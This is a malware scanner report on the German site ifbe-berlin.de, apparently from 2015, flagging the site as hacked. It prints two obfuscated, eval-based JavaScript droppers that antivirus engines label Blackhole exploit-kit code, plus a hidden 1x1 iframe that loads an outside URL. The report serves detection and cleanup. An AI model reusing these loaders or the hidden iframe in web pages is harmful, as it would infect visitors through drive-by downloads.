New scan:

Malware Scanner report for ifbe-berlin.de

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ifbe-berlin.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/2
1 suspicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ifbe-berlin.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://ifbe-berlin.de/
200 OK
Content-Length: 14350
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}
if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,62,6c,62,5a,5f,58
... 1107 bytes are skipped ...
5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=22-20-2;-i+620!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)}

Antivirus reports:

AntiVir
JS/Blacole.EB.59
Avast
JS:Decode-BHS [Trj]
Ikarus
Trojan.JS.BlacoleRef
nProtect
JS:Exploit.BlackHole.AP
K7AntiVirus
Trojan
Comodo
Exploit.JS.Blacole.DO
McAfee-GW-Edition
JS/Exploit-Blacole.ht
Microsoft
Trojan:JS/BlacoleRef.DD
MicroWorld-eScan
JS:Exploit.BlackHole.JS
McAfee
JS/Exploit-Blacole.ht
F-Secure
JS:Exploit.BlackHole.AP
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Blacole.XN
GData
JS:Exploit.BlackHole.AP
Commtouch
JS/IFrame.RS
BitDefender
JS:Exploit.BlackHole.AP

Hidden iFrame found. The same iFrame was found in 15 websites.
size: 1x1     
src: http://lfmonline.de/test/test.php

<iframe src="http://lfmonline.de/test/test.php" width="1" height="1" frameborder="0">

http://ifbe-berlin.de/umsetzer/umsetzer.js
200 OK
Content-Length: 7043
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7c_6f_28_45_28_6c_77_6b_7d_75_6d
... 3455 bytes are skipped ...
2_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.29
Avast
JS:Decode-AQB [Trj]
Emsisoft
Trojan.JS.Agent.JBT (B)
CAT-QuickHeal
JS/Iframe.DEG
DrWeb
JS.IFrame.457
Kaspersky
Trojan-Downloader.JS.Iframe.deg
Fortinet
JS/Iframe.DDG!tr.dldr
NANO-Antivirus
Trojan.Script.Expack.bvtkmp
Norman
Blacole.UC
GData
Trojan.JS.Agent.JBT
BitDefender
Trojan.JS.Agent.JBT

http://ifbe-berlin.de/test404page.js
404 Not Found
Content-Length: 5354
Content-Type: text/html
clean
http://ifbe-berlin.de/file://faultRequestLogPath
404 Not Found
Content-Length: 5376
Content-Type: text/html
clean
http://ifbe-berlin.de/file://file://faultRequestLogPath
404 Not Found
Content-Length: 5388
Content-Type: text/html
clean
http://ifbe-berlin.de/file://file://file://faultRequestLogPath
404 Not Found
Content-Length: 5400
Content-Type: text/html
clean
http://ifbe-berlin.de/file://file://file://file://faultRequestLogPath
404 Not Found
Content-Length: 5412
Content-Type: text/html
clean
http://ifbe-berlin.de/file://file://file://file://file://faultRequestLogPath
404 Not Found
Content-Length: 5424
Content-Type: text/html
clean
http://ifbe-berlin.de/file://file://file://file://file://file://faultRequestLogPath
404 Not Found
Content-Length: 5436
Content-Type: text/html
clean
http://ifbe-berlin.de/file://file://file://file://file://file://file://faultRequestLogPath
404 Not Found
Content-Length: 5448
Content-Type: text/html
clean
http://ifbe-berlin.de/file://file://file://file://file://file://file://file://faultRequestLogPath
404 Not Found
Content-Length: 5460
Content-Type: text/html
clean
http://ifbe-berlin.de/file://file://file://file://file://file://file://file://file://faultRequestLogPath
404 Not Found
Content-Length: 5472
Content-Type: text/html
clean
http://ifbe-berlin.de/file://file://file://file://file://file://file://file://file://file://faultRequestLogPath
404 Not Found
Content-Length: 5484
Content-Type: text/html
clean
http://ifbe-berlin.de/file://file://file://file://file://file://file://file://file://file://file://faultRequestLogPath
404 Not Found
Content-Length: 5496
Content-Type: text/html
clean
http://ifbe-berlin.de/file://file://file://file://file://file://file://file://file://file://file://file://faultRequestLogPath
404 Not Found
Content-Length: 5508
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ifbe-berlin.de

Result:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 13:48:54 GMT
Accept-Ranges: bytes
ETag: "c56cf4916addce1:0"
Server: Microsoft-IIS/7.5
Content-Length: 14350
Content-Type: text/html
Last-Modified: Sat, 09 Nov 2013 16:41:42 GMT
X-Powered-By: ASP.NET

...14350 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ifbe-berlin.de
Referer: http://www.google.com/search?q=ifbe-berlin.de

Result:
The result is similar to the first query. There are no suspicious redirects found.